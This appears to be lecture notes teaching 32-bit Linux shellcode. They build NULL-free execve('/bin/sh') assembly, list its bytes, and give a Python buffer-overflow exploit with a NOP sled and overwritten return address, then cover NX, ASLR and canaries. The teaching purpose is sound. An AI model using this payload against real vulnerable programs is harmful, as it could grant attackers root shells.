Shellcode
The previous module showed how overwriting a return address redirects execution to existing code — a target() function already in the binary. But real binaries rarely contain a ready-made execve("/bin/sh", …) call. When there is no convenient target to hijack, an attacker injects their own machine code into the process and points the return address at it. That injected payload is called shellcode, because its classic goal is spawning an interactive shell.
Writing shellcode forces you to understand the lowest-level details of how programs communicate with the operating system: the system-call interface.
The Linux system-call interface
User programs cannot directly access hardware resources — they must ask the kernel via system calls. On Linux, the CPU transitions from user mode to kernel mode, executes the requested service, and returns. In assembly you trigger this transition with a single instruction; which instruction depends on the ABI:
| ABI | Trigger instruction | Syscall # register | Arg registers (in order) |
|---|---|---|---|
| x86 32-bit (int $0x80) | int $0x80 | %eax | %ebx, %ecx, %edx, %esi, %edi, %ebp |
| x86-64 (syscall) | syscall | %rax | %rdi, %rsi, %rdx, %r10, %r8, %r9 |
The simplest example: getpid is syscall number 20 (0x14) on 32-bit Linux. To call it:
mov $0x14, %eax # syscall number for getpid
int $0x80 # enter the kernel
Every syscall has a fixed number you can look up (e.g., at syscalls32.paolostivanin.com). The kernel ignores register contents it does not need for a given call.
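The register conventions in the table can be written down as a small lookup, which makes it easy to see what must be loaded before the trigger instruction runs. This is a minimal sketch: `SYSCALL_ABI` and `plan_syscall` are hypothetical names introduced for illustration, and the `write` example assumes its i386 syscall number, 4.

```python
# Register conventions copied from the table above.
SYSCALL_ABI = {
    "i386": {
        "trigger": "int $0x80",
        "number": "eax",
        "args": ["ebx", "ecx", "edx", "esi", "edi", "ebp"],
    },
    "x86_64": {
        "trigger": "syscall",
        "number": "rax",
        "args": ["rdi", "rsi", "rdx", "r10", "r8", "r9"],
    },
}


def plan_syscall(abi, number, *args):
    """Return (register assignments, trigger instruction) for one syscall.

    Hypothetical helper: it only describes the setup, it does not run anything.
    """
    conv = SYSCALL_ABI[abi]
    if len(args) > len(conv["args"]):
        raise ValueError("too many arguments for this ABI")
    regs = {conv["number"]: number}
    regs.update(zip(conv["args"], args))  # arguments fill registers in order
    return regs, conv["trigger"]


# getpid takes no arguments, so only the syscall-number register is set.
print(plan_syscall("i386", 0x14))
# A three-argument call (write is number 4 on i386) uses ebx, ecx, edx.
print(plan_syscall("i386", 4, "fd", "buf", "count"))
```

Registers that do not appear in the returned mapping are the ones the kernel ignores for that call.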
The target syscall: execve
The goal of most shellcode is to call execve, which replaces the current process image with a new program:
int execve(const char *filename, char *const argv[], char *const envp[]);
Called as execve("/bin/sh", {"/bin/sh", NULL}, NULL) it spawns a shell — and if the victim process was Set-UID root, that shell inherits root privileges.
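To see what "replaces the current process image" means in practice, the same call can be made from Python through `os.execve`. The sketch below assumes a Unix-like system with `/bin/sh` present; `run_via_execve` is a hypothetical helper, and it passes an empty environment mapping where the C call above passes NULL. It forks first so that only the child is replaced.

```python
import os


def run_via_execve(path, argv, envp):
    """Fork, replace the child with `path` via execve, return its exit code."""
    pid = os.fork()
    if pid == 0:  # child process
        try:
            # On success this never returns: the child becomes `path`.
            os.execve(path, argv, envp)
        finally:
            # Reached only if execve raised; never fall back into the caller.
            os._exit(127)
    _, status = os.waitpid(pid, 0)  # parent waits for the child
    return os.WEXITSTATUS(status)


# argv[0] is the program name by convention; "-c" makes the shell run one
# command and exit instead of waiting for interactive input.
code = run_via_execve("/bin/sh", ["/bin/sh", "-c", "exit 7"], {})
print(code)
```

The child reports the shell's exit status (7 here), not anything from the Python program that called `execve`, because that program no longer exists in the child.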
On 32-bit Linux, sys_execve is syscall 0x0b (11). The register mapping is:
| Register | Value |
|---|---|
| %eax | 0x0b (syscall number) |
| %ebx | pointer to the filename string ("/bin/sh") |
| %ecx | pointer to the argv array ({ptr_to_binsh, NULL}) |
| %edx | pointer to the envp array (NULL, i.e. no environment) |
Building execve shellcode step by step
The challenge is that shellcode must be position-independent: it has no idea where in memory it will land, so it cannot use hardcoded addresses. The classic solution is to build the "/bin/sh" string and the argv array on the stack at runtime, then read their addresses back from %esp.
Step 1 — Push "/bin/sh" onto the stack
In 32-bit mode, push operates on 4-byte dwords. The string "/bin/sh" is 7 bytes; pad it to 8 by writing "//bin/sh" (the double slash is harmless to the kernel). Because the stack grows downward, push the null terminator first, then the second half of the string ("n/sh"), then the first half ("//bi"):
xor %eax, %eax # zero eax (no NULL bytes in the instruction)
mov %eax, %edx # edx = 0 (envp = NULL)
push %eax # push null terminator for the string
push $0x68732f6e # "n/sh" (little-endian: 6e 2f 73 68)
push $0x69622f2f # "//bi" (little-endian: 2f 2f 62 69)
mov %esp, %ebx # ebx --> "//bin/sh\0" on the stack
After these pushes %esp points at the start of "//bin/sh", so mov %esp, %ebx gives us the filename pointer.
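The two push immediates do not have to be worked out by hand. As a minimal sketch (the helper name `push_immediates` is an assumption, not part of any tool), the string can be split into 4-byte chunks, each chunk read as a little-endian dword, and the chunks emitted last-first:

```python
import struct


def push_immediates(s, word=4):
    """Return the dword immediates to push, in push order, for string `s`."""
    data = s.encode("ascii")
    if len(data) % word:
        raise ValueError("pad the string to a multiple of 4 bytes first")
    chunks = [data[i:i + word] for i in range(0, len(data), word)]
    # The stack grows downward, so the last chunk of the string is pushed first.
    return [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]


for imm in push_immediates("//bin/sh"):
    print(f"push $0x{imm:08x}")
```

Passing the unpadded "/bin/sh" raises an error, which is the reason for the extra slash.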
Step 2 — Build the argv array and set %ecx
execve needs argv = {ptr_to_binsh, NULL}. Push NULL (already in %eax) then push %ebx, then capture %esp:
push %eax # argv[1] = NULL
push %ebx # argv[0] = pointer to "//bin/sh"
mov %esp, %ecx # ecx --> { ptr_to_binsh, NULL }
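The stack layout produced by Steps 1 and 2 can be checked with a small model of a downward-growing 32-bit stack. This is an illustration only: the `Stack` class is hypothetical and the starting address 0xffffd000 is an arbitrary assumption, since the real value of %esp is not known in advance.

```python
import struct


class Stack:
    """Tiny model of a 32-bit stack that grows toward lower addresses."""

    def __init__(self, top=0xFFFFD000, size=64):
        self.base = top - size  # lowest modelled address
        self.mem = bytearray(size)
        self.esp = top

    def push(self, value):
        self.esp -= 4  # push decrements esp, then stores
        off = self.esp - self.base
        self.mem[off:off + 4] = struct.pack("<I", value)

    def read(self, addr, n):
        off = addr - self.base
        return bytes(self.mem[off:off + n])


st = Stack()
eax = 0                      # xor %eax, %eax

# Step 1: terminator, then "n/sh", then "//bi"
st.push(eax)
st.push(0x68732F6E)
st.push(0x69622F2F)
ebx = st.esp                 # mov %esp, %ebx

# Step 2: argv[1] = NULL, argv[0] = pointer to the string
st.push(eax)
st.push(ebx)
ecx = st.esp                 # mov %esp, %ecx

print(st.read(ebx, 9))       # the filename, including its terminator
argv0, argv1 = struct.unpack("<II", st.read(ecx, 8))
print(hex(argv0), argv1)     # argv[0] equals ebx, argv[1] is 0
```

Reading upward from %ebx yields the string in its natural order even though its halves were pushed in reverse, and the argv array sits directly below the string.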
Step 3 — Set %eax and invoke
movb $0x0b, %al # eax = 0x0b (low byte only, avoids NULL bytes)
int $0x80 # syscall: execve("//bin/sh", argv, NULL)
Complete NULL-free shellcode
xor %eax, %eax # eax = 0
mov %eax, %edx # edx = 0 (envp)
push %eax # null terminator
push $0x68732f6e # "n/sh"
push $0x69622f2f # "//bi"
mov %esp, %ebx # ebx --> filename
push %eax # argv[1] = NULL
push %ebx # argv[0] = ptr to filename
mov %esp, %ecx # ecx --> argv
movb $0x0b, %al # eax = 11
int $0x80 # execve("//bin/sh", argv, NULL)
The NULL-byte problem — and how to fix it
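String-copying functions such as strcpy stop at the first \x00 byte, so a single NULL byte anywhere in the shellcode silently truncates the payload: the rest of the code never reaches the buffer. Other input functions have different terminators (gets, for example, stops at a newline, \x0a, rather than at \x00), so the set of forbidden bytes depends on how the vulnerable program reads its input.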
The naive version of this shellcode contains several NULL bytes:
b8 0b 00 00 00 mov $0xb, %eax ← three NULLs
b9 00 00 00 00 mov $0x0, %ecx ← four NULLs
ba 00 00 00 00 mov $0x0, %edx ← four NULLs
6a 00 push $0x0 ← one NULL
The fixes applied above:
| Naive (contains NULLs) | NULL-free replacement | Why it works |
|---|---|---|
| mov $0x0, %eax | xor %eax, %eax | XOR of a register with itself is always 0; opcode 31 c0 has no zero bytes |
| push $0x0 | push %eax (after zeroing) | pushes the already-zeroed register |
| mov $0x0b, %eax (opcode b8 0b 00 00 00) | movb $0x0b, %al (opcode b0 0b) | writes only the low byte; upper bytes were already zeroed by xor |
| mov $0x0, %edx | mov %eax, %edx (after zeroing %eax) | copies zero without embedding a zero byte |
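Checking a payload for forbidden bytes is easy to automate. The sketch below uses a hypothetical helper, `find_bad_bytes`, and compares the naive encoding of mov $0xb, %eax with its NULL-free replacement. The `bad` parameter is an assumption added for flexibility, since the forbidden set depends on the vulnerable input function.

```python
def find_bad_bytes(code, bad=b"\x00"):
    """Return (offset, value) for every byte of `code` that appears in `bad`."""
    return [(i, b) for i, b in enumerate(code) if b in bad]


naive = bytes.fromhex("b80b000000")  # mov $0xb, %eax
clean = bytes.fromhex("31c0b00b")    # xor %eax, %eax then movb $0xb, %al

print(find_bad_bytes(naive))  # offsets of the three zero bytes
print(find_bad_bytes(clean))  # empty list: nothing forbidden
```

Running the same check over a finished payload before delivering it catches a stray zero byte early, instead of as a silently truncated exploit.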
Assembling and extracting the bytes
Write the shellcode as an assembly file (shellcode.S), assemble it, then extract the raw bytes with objcopy or objdump:
gcc -m32 -nostdlib -static -o shellcode shellcode.S
objdump -d shellcode | grep -Po '\t\K[0-9a-f ]+(?=\t)'
The slides show the assembled bytes for the complete shellcode:
\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89
\xe1\xb0\x0b\xcd\x80
No byte in this sequence is \x00.
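Converting a hex dump into the escaped form, and confirming the claim about zero bytes, takes only a few lines. In this sketch `to_escaped` is a hypothetical helper, and the dump is typed in by hand from the bytes listed above rather than captured from objdump.

```python
def to_escaped(hex_dump):
    """Turn whitespace-separated hex bytes into (raw bytes, '\\x..' string)."""
    raw = bytes.fromhex("".join(hex_dump.split()))  # drop spaces and newlines
    escaped = "".join(f"\\x{b:02x}" for b in raw)
    return raw, escaped


dump = """
31 c0 89 c2 50 68 6e 2f 73 68
68 2f 2f 62 69 89 e3 50 53 89
e1 b0 0b cd 80
"""

raw, escaped = to_escaped(dump)
print(len(raw))     # payload length in bytes
print(0 in raw)     # whether any byte is \x00
print(escaped)
```

The `raw` value can be pasted into an exploit script as a bytes literal, or used directly if the script imports this helper.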
Delivering the shellcode: the exploit script
With the raw bytes in hand, the exploit script (Python 3) assembles the full payload:
#!/usr/bin/env python3
import sys
shellcode = (
b"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68"
b"\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89"
b"\xe1\xb0\x0b\xcd\x80"
)
content = bytearray(0x90 for _ in range(100)) # NOP sled
start = 16
content[start:start + len(shellcode)] = shellcode
ret = 0xffffcfd0 # estimated address inside the NOP sled
offset = 76 # bytes from buffer start to saved return address
L = 4 # 4 bytes for 32-bit address
content[offset:offset + L] = ret.to_bytes(L, byteorder='little')
sys.stdout.buffer.write(content)
Key points: the buffer is prefilled with \x90 (NOP, opcode 0x90) rather than 'A', the shellcode is placed at an arbitrary offset inside the sled, and the return address is written at the offset discovered by cyclic/GDB. Because x86 is little-endian, ret.to_bytes(L, byteorder='little') writes the address bytes in the correct order.
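The layout rules implied by the script can be made explicit as checks. This is a sketch under the same assumptions as the script (100-byte payload, offset 76, 4-byte address); `build_payload` is a hypothetical wrapper. It refuses to build a payload whose shellcode overlaps the saved return address, or whose bytes include a forbidden value.

```python
def build_payload(shellcode, ret, offset, start, size=100, bad=b"\x00"):
    """Build NOP-filled payload; raise ValueError if the layout cannot work."""
    ret_bytes = ret.to_bytes(4, byteorder="little")
    if start + len(shellcode) > offset:
        raise ValueError("shellcode would overlap the saved return address")
    if offset + 4 > size:
        raise ValueError("payload too short to reach the return address")
    if any(b in bad for b in shellcode + ret_bytes):
        raise ValueError("payload contains a forbidden byte")
    payload = bytearray(b"\x90" * size)            # NOP fill
    payload[start:start + len(shellcode)] = shellcode
    payload[offset:offset + 4] = ret_bytes
    return bytes(payload)


shellcode = (
    b"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68"
    b"\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89"
    b"\xe1\xb0\x0b\xcd\x80"
)

payload = build_payload(shellcode, 0xFFFFCFD0, offset=76, start=16)
print(payload[76:80].hex())  # return address as it appears in memory
```

The forbidden-byte check covers the return address too: an address such as 0xffffd000 has a zero low byte and is rejected.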
Guessing the address: the NOP sled
Even after finding the buffer-to-return-address offset, you still need to guess where in memory the buffer lives — that is, what value to write as the new return address. Stack addresses vary between runs due to environment differences and ASLR.
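The NOP sled (\x90\x90…) solves this: if the guessed address lands anywhere in the sled, execution slides harmlessly down the NOPs into the shellcode. A sled of N NOPs in front of the shellcode turns a single valid return address into N + 1 of them (any sled byte, or the first shellcode byte), so a 100-byte sled tolerates a guess that is off by up to 100 bytes in one direction.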
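The effect of the sled can be counted with a deliberately simplified model: treat the payload as a byte string, start "execution" at a candidate offset, and step over NOPs until the shellcode's first byte is reached. The helper `lands_on_shellcode` is hypothetical, and the model ignores everything a real CPU does apart from skipping 0x90 bytes.

```python
def lands_on_shellcode(payload, entry, shellcode_start):
    """Follow NOPs from `entry`; True if execution reaches `shellcode_start`."""
    pos = entry
    while pos < shellcode_start:
        if payload[pos] != 0x90:   # anything but a NOP derails execution
            return False
        pos += 1
    # Entering past the first shellcode byte would start mid-instruction.
    return pos == shellcode_start


sled_len = 16
payload = b"\x90" * sled_len + b"\x31\xc0"   # sled, then start of shellcode

good = [e for e in range(len(payload))
        if lands_on_shellcode(payload, e, sled_len)]
print(len(good))   # number of entry offsets that work
```

With a 16-byte sled there are 17 working entry points instead of one. The window grows linearly with the sled length.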
Defenses that break this attack
Two mitigations directly target shellcode injection, and a third detects the overflow itself:
- Non-Executable Stack (NX / W^X): Hardware marks stack pages as non-executable. If %eip ever points into the stack, the CPU raises a fault. This stops injected shellcode cold, which is why modern exploit techniques pivoted to Return-Oriented Programming (ROP), reusing existing executable code.
- ASLR (Address Space Layout Randomization): The OS randomizes the base address of the stack (and heap, libraries) on every execution. With kernel.randomize_va_space=2, both stack and heap addresses change each run, making it hard to guess where the NOP sled lives. The gcc -no-pie -fno-pic flags produce non-position-independent binaries that use absolute addresses and are easier to exploit; PIE binaries with ASLR are much harder.
- Stack canaries (StackGuard): A secret value is placed between the buffer and the return address; overwriting it is detected before ret executes.
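Before testing an exploit it helps to know which ASLR mode the machine is in. The sketch below reads the sysctl through procfs. The helper name `read_aslr_mode` is an assumption, the descriptions paraphrase the kernel's documented meanings for values 0, 1, and 2, and the function returns None on systems where the file does not exist.

```python
from pathlib import Path

# Meanings of kernel.randomize_va_space values (paraphrased).
ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base, VDSO and shared libraries randomized",
    2: "as 1, plus the heap (brk) randomized",
}


def read_aslr_mode(path="/proc/sys/kernel/randomize_va_space"):
    """Return the current ASLR mode as an int, or None if unavailable."""
    p = Path(path)
    if not p.exists():
        return None
    return int(p.read_text().strip())


mode = read_aslr_mode()
if mode is None:
    print("ASLR setting not available on this system")
else:
    print(mode, "-", ASLR_MODES.get(mode, "unknown mode"))
```

A value of 0 means stack addresses stay the same from run to run, so a guessed return address is far more likely to stay valid.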
Key takeaways
- Shellcode is self-contained machine code injected into a vulnerable process to perform an action — typically spawning a shell via a direct syscall.
- The 32-bit Linux syscall ABI: load the syscall number into %eax, arguments into %ebx/%ecx/%edx, then execute int $0x80.
- sys_execve is syscall 0x0b; its three arguments map to %ebx (filename), %ecx (argv), %edx (envp).
- Position independence is achieved by building strings and pointer arrays on the stack at runtime and reading addresses from %esp.
- Every instruction that encodes a zero byte must be replaced: xor %eax,%eax instead of mov $0,%eax; movb $0x0b,%al instead of mov $0x0b,%eax.
- A NOP sled (\x90 bytes prepended to the shellcode) tolerates imprecise guesses of the shellcode's address.
- NX stack defeats injected shellcode by making stack pages non-executable; ASLR makes the injection address hard to guess.